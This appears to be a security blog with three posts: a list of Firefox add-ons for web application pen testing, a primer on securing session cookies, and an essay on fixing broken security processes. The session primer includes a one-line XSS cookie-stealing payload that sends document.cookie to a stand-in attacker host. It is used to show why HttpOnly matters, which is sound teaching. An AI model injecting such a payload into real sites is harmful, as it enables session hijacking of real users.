Firefox For Ninjas

It’s fairly common to be asked about your favorite tools, but the problem is that it’s pretty difficult to give anyone a simple answer.  When dealing with network and application pen testing, there’s probably a tool for every attack vector, but the tool you use is going to change based on the task at hand.  If there was one tool I couldn’t do without, it would undoubtedly be Firefox.  On its own it can do some pretty sweet stuff, but its extensibility is what makes it such a powerful tool.

I thought it would be appropriate to list my top 10 Firefox add-ons, which I always use for testing web applications.  So, in no particular order:

1. Firebug – Without a doubt one of the most amazing pieces of software ever produced.  Its capabilities are far too numerous to list here, but suffice it to say that it’s pretty much a must-have for anyone in the business of development or security testing.  If this is a new tool for you, be sure to check out this tutorial for help getting started.

2. FoxyProxy – FoxyProxy is a very robust proxy add-on and while anonymity is great, I always use it for switching to and from my local proxy.  FoxyProxy also allows for whitelisting, logging and lots more.

3. Web Developer – The Firefox Web Developer add-on is an awesome tool which allows you to do far more than I am even going to get into.  It’s somewhat similar to Firebug in its abilities, but some things are just a bit easier to do with Web Developer than with Firebug.  If you’re using it while doing security testing on web applications, make sure to leverage its forms tools.

4. Greasemonkey – Greasemonkey is truly awesome and can allow you to do some impressive stuff with just a little JavaScript hackery, particularly with more complex client-side controls (there’s a small example after this list).  Be sure to check out the Greasemonkey wiki and userscripts.org for some examples and inspiration.

5. Groundspeed – “Groundspeed is an add-on that allows security testers to manipulate the application user interface to eliminate annoying limitations and client-side controls that interfere with the web application penetration tests.”  Enough said :)

6. User Agent Switcher – User Agent Switcher is pretty self-explanatory.  It lets you change your user agent on the fly, which can come in handy when dealing with more dated content, like sites best viewed in IE5.  It’s of course also great for dealing with mobile applications and applications that specifically target IE, Safari, or some other browser.

7. View Source Chart – This add-on is pretty simple and pretty helpful; it’s a great tool for beautifying the source code of rendered pages.

8. HackBar – I’m actually not a big fan of this one simply because having it enabled consumes too much browser space for my comfort.  It is, however, very useful for performing various encoding, encryption, and other minor application wizardry tasks.  A personal favorite is the “Split URL” feature, which provides a nice URL breakdown; very helpful when dealing with massive URLs.

9. Live HTTP Headers – Not a terribly fancy add-on but useful and simple when you need to view the HTTP headers as you browse.

10. Add N Edit Cookies – Small and useful.  This add-on allows you to add and edit saved cookies and session data.
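
As promised in the Greasemonkey entry above, here’s a tiny example of the client-side tampering it makes trivial.  This is a hypothetical userscript (the @include pattern and target page are placeholders) that strips length limits and re-enables “locked” form controls so the server-side validation, or lack thereof, can be tested directly:

    // ==UserScript==
    // @name     Unshackle Forms
    // @include  http://example.com/*
    // ==/UserScript==

    // Remove client-side restrictions from every form control on the page.
    for (const el of document.querySelectorAll('input, textarea, select')) {
      el.removeAttribute('maxlength');
      el.disabled = false;
      el.readOnly = false;
    }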

Have some favorites of your own that weren’t listed?  Leave a comment and let everyone know!

So, about that session data you sent me…

One of the best things about web applications is…well, a lot of things, most notably scalability, extensibility, and cross-platform compatibility (lots of other ‘ly words too).  One of the worst things web applications and web services have going for them is security.  I am sure that we’re all familiar with things like the OWASP Top 10 and WASC, but many of the developers responsible for creating the applications we depend on so much are often not familiar with this material.  It’s true that there is an abundance of application security information for developers, but it’s rarely implemented or regarded as a core component of the SDLC.  Despite how long we’ve known about certain vulnerabilities, we continue to see them in both small-scale and enterprise applications, and to be honest, I don’t think it’s fair to fault the developers.  Lately, the most common vulnerabilities I have seen in web applications are directly related to poor session security and session management.

By no means is this intended as a thorough guide on securing your application nor is it groundbreaking material, but it may serve as a useful primer for those looking for introductory information on securing session data.

Since Wikipedia, Microsoft, OWASP, and others have already done a fine job with the verbiage, a rehash will suffice:

Think of a session as a semi-permanent interactive information interchange, also known as a dialogue, that transpires between two or more communicating devices.  In the context of web applications, the session most frequently refers to the exchange of data between the end user and the remote application.  Lastly, an application can use the session data to track whether a user has authenticated to the application, what resources they have accessed, and when their session expires in addition to a whole lot of other stuff.

So, now that we’re very well versed in all things session related, how do we protect this sensitive information?  Here are four basic things to get you started:

Mark cookies secure

When a user traverses a website, it is not uncommon for the user to be directed to URLs that use both HTTP and HTTPS.  Because the HTTP page views are not encrypted and may transmit sensitive session data, all cookies associated with a given user’s session should be marked as secure.  A cookie marked as secure will not be transmitted over a plaintext channel, minimizing the chance that it will be intercepted.
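
For illustration, here’s a minimal sketch of issuing such a cookie using Node’s built-in http module; the cookie name and value are placeholders, and in a real deployment the server would of course sit behind TLS:

    const http = require('http');

    // A bare-bones server that issues a session cookie. The Secure attribute
    // tells the browser never to send this cookie back over plaintext HTTP.
    http.createServer((req, res) => {
      res.setHeader('Set-Cookie', 'sid=abc123; Secure; Path=/');
      res.end('session established\n');
    }).listen(8080);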

Mark cookies as HTTP only

Cross-site scripting attacks aren’t new, and since preventing XSS would be an entirely different post, best practice dictates that cookies should be marked HTTPOnly.  When a cookie is marked HTTPOnly, its value cannot be read by client-side script.  This is particularly useful against XSS attacks, which are commonly used for session hijacking: the payload transmits a user’s session data to a remote entity.

For example, if successfully used in an XSS attack, JavaScript’s “document.cookie” can be used to create a log entry in the web logs of a server controlled by an attacker.  That log entry would contain the session data required to mount a session hijacking attack.  A few other things need to be true of the application’s behavior for the hijack to succeed, but most of the time it works with little fuss.
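
To make that concrete, the injected payload can be a one-liner.  This is a hypothetical example, with attacker.example standing in for a server the attacker controls:

    // Injected via XSS: silently requests an "image" from the attacker's
    // server, leaking the victim's cookies into that server's access logs.
    new Image().src = 'http://attacker.example/steal?c=' +
        encodeURIComponent(document.cookie);

With the cookie from the previous sketch reissued as “sid=abc123; Secure; HttpOnly; Path=/”, document.cookie simply no longer contains the session identifier.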

Encrypt all communications between client and server which transmit session data

Marking cookies as secure should prevent them from being sent unencrypted; however, you really shouldn’t rely on just one mechanism to keep that data safe.  If a user is sent to a secure page, think long and hard before you decide to send them back to HTTP, and about what you are sending with them over that unencrypted connection.  Many times you will see that a site’s login page redirects to https://blahfoobiz.com/login.asp, but once the user has logged in, they get sent to http://blahfoobiz.com/myaccount.asp.  It’s great that the credentials have been sent over HTTPS, but since the redirect to myaccount.asp is over HTTP, not only could sensitive session data be transmitted in an insecure fashion, but the data contained on myaccount.asp is also vulnerable to interception.
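
One blunt way to avoid that trap is to never serve application pages over HTTP at all.  Here’s a minimal sketch, again using Node’s http module, that bounces every plaintext request to its HTTPS equivalent (blahfoobiz.com being our fictional site from above):

    const http = require('http');

    // Listen on port 80 purely to redirect; the actual application
    // only ever answers over HTTPS on port 443.
    http.createServer((req, res) => {
      res.writeHead(301, { Location: 'https://blahfoobiz.com' + req.url });
      res.end();
    }).listen(80);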

Tie your users to the session

I would say that this is probably the most important of the four points listed.  When a user accesses resources on your application, they provide a tremendous amount of information, such as source IP address, browser version, operating system, and much more.  Since this information is already being sent to the application, make the application use it.  By incorporating this data, you can create a relatively unique fingerprint of the authenticated user, which can in turn be used to provide additional session security.  It’s true that just about everything the client sends you can be forged, and that’s unfortunate; however, depending on the client data you are hashing/mashing, reproducing it can be very difficult for an attacker.  Once you have this information, you can check it against future requests made using an established session and verify that they are in fact coming from the original user.  If the information does not match, the session should be effectively terminated.
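
As a rough illustration (not a drop-in implementation), here’s what that hashing/mashing might look like in Node; the secret, the choice of inputs, and the function names are all assumptions you’d tune for your own application:

    const crypto = require('crypto');

    // Server-side secret so an attacker can't precompute fingerprints.
    const SECRET = 'replace-with-a-real-secret';

    // Derive a fingerprint from attributes the client already sends.
    function fingerprint(req) {
      const data = [
        req.socket.remoteAddress,        // source IP address
        req.headers['user-agent'] || '', // browser and OS string
      ].join('|');
      return crypto.createHmac('sha256', SECRET).update(data).digest('hex');
    }

    // Store fingerprint(req) with the session at login; on every later
    // request, recompute and compare. On a mismatch, kill the session.
    function sessionIsValid(req, session) {
      return session.fingerprint === fingerprint(req);
    }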

Again, all of this is far from comprehensive but it seemed worth mentioning.

Broken Processes and Broken Systems

New URL, same post.  Anyways…

Over the past ten years there has been a dramatic shift in information security and the role it plays in business continuity. This change has moved information security from being widely regarded as an irritating necessity to being a mission-critical component. With big names and massive breaches, such as T.J. Maxx and Heartland Payment Systems, there is increasing pressure from both consumers and shareholders to better protect corporate and personal assets.

I think we can all agree that more intelligent and more rigid security measures are, well, better, but there’s one major problem: a majority of this new security is so poorly implemented and maintained that it’s really only providing an illusion of security. In my opinion, this is more dangerous than acknowledging that an organization is failing to adequately secure its environment. I mean, if you’ve kind of sort of “secured” this sensitive information once, it’s secured for good, right? What’s even worse is that many of the people responsible for propagating such poor security practices are the very ones who have been tasked with securing these valuable assets in the first place! In my experience, this occurs for a variety of reasons which probably aren’t worth getting into right now, but suffice it to say that when it comes to the infosec community, there are a lot of things we need to change, and they need to change fast.

Unfortunately, I don’t have all the answers; in fact, I might not have any answers, but I do have some ideas. I think in order to be a successful practitioner of any discipline, one must have rules: beliefs that serve as the basis for your methodology and make you a true professional. Many people in the community have grown disenchanted with the attempts made at effective security, and many others are new to the community and haven’t yet had the experiences to form their own ideas. There’s also a large number of people who don’t bother with ideas at all, and just do the things they do out of vendor favoritism, common practice, and even pure laziness. The fact of the matter is that there’s no best vendor for everything, common practice does not necessarily mean best practice, and if you’re lazy, well, you’ve probably stopped reading by now.

I’ve rolled a lot of ideas around in my head for quite a while now, and after some time, it’s all starting to make more sense. Here are some things to think about…

  1. It is important to patch the application and patch the OS, but it is more important to fix the broken process which allows these problems to exist.

This is possibly my biggest concern in information security: the process does not get patched. Vulnerabilities are transient, system state is always subject to change, and you cannot account for every bug and every attack vector, but there is a lot to be said for trying. If you examine any environment, you will find that there is always a tremendous amount of change, and these changes are often not properly reviewed in the context of security. Let’s do a walkthrough on this one, and an overly simplified one at that.

Bob is a security engineer at Frobnitz Inc., and he is in charge of quarterly vulnerability scanning and remediation tracking. At the start of the quarter, Bob has scanned all relevant systems and has a nice executive summary complete with some pretty graphs and pie charts. The bad part is that there are a lot of high- and medium-severity vulnerabilities in these pies, and that’s not a good thing. Now that vulnerability scanning has completed and management is aware of Bob and his red pies, the next logical step takes our friend to remediation efforts. Let’s move the situation along and just say that remediation is a huge success and completes in the most expeditious way (hah). At the end of the quarter, Bob proudly presents his new green pies to management and there is much celebration. With this task completed (for now), Bob goes back to managing the firewalls, IDS/IPS, AV, etc., putting all this silly vulnerability stuff behind him.

As time goes on, Bob finds himself entering Q2, and it’s time to start vulnerability scanning for the quarter. Just like before, the scans complete and Bob has new reports for a quarterly update with the boss. Only there’s one problem: Bob’s green pies are getting red again, and just like before, the last thing Bob needs is more red pies. So, in keeping with tradition, Bob goes back to the task of remediation, presents the final report, basks in his green pie charts, and waits for next quarter.

Now, there is one major problem here which I would hope many would have noticed:

Insanity: doing the same thing over and over again and expecting different results.
~Albert Einstein

Our fictitious friend parallels many people’s efforts in the field in an unfortunate way. You see, too often people don’t stop and ask the important question of “Why?” When looking at something like scan results, the vulnerabilities are easy to see, but taking the time to understand them, and furthermore to correct their cause, takes more effort. Situations such as this are incredibly common; so common that they eventually just become accepted, and that’s about as useful as a bunch of red pies on your weekly/quarterly/whateverly scans, because that’s exactly what you will end up with.

To complicate matters even further, the root cause of such things is often fairly far from your immediate scope, and effectively suggesting and implementing these changes can become a full-time job with a lot of pushback in no time at all. On this note, it’s important to realize something: everything is within scope. You see, when you provide security services, especially as an internal consultant, all of the teams that are “unrelated” to your work may be introducing new security flaws to the environment. As a result, it’s now related, you need to be involved, and it’s important to exercise your expertise and guide neighboring teams in an effort to improve or even fix their processes and systems. And I feel the need to make this known: trying to push these changes isn’t the fast track to being the cool kid (sorry). Most people are inherently resistant when it comes to change, and that holds very true in IT. From software developers, to the patch management people, to architecture teams, and even the guy in marketing who gets told that he can’t run uTorrent at the office anymore, people will likely not enjoy these changes. Please keep one very important thing in mind: our job is to enhance and supplement the integrity and security of the environment, and you cannot do that by turning a blind eye to broken processes that expose corporate assets and jeopardize the confidentiality of sensitive information.

Now that expectations have been set and we’re aware that it’s not easy to be well liked and be in information security at the same time, what do we do? Well, this goes back to what I said before: I don’t have all the answers. But for what it’s worth, I will describe an approach which has worked for me in the past. Be diplomatic, understand other teams’ concerns regarding the implementation of your ideas, establish a rapport so that your ideas will be well received, and lastly, in subtle ways, remind others that while you may technically be on different teams, the bigger picture is that you’re all on the same team. Some people might feel like you’re creating more work for them, and at face value, that’s probably true. But if you were to ask someone whether they want to enhance the patch management and system deployment processes or play catch-up with hundreds of machines after quarterly vulnerability scanning, which do you think they would pick?

I think I am out of energy to write down more points, but hopefully I can post them in the near future, time permitting of course. In the meantime, thanks for reading.
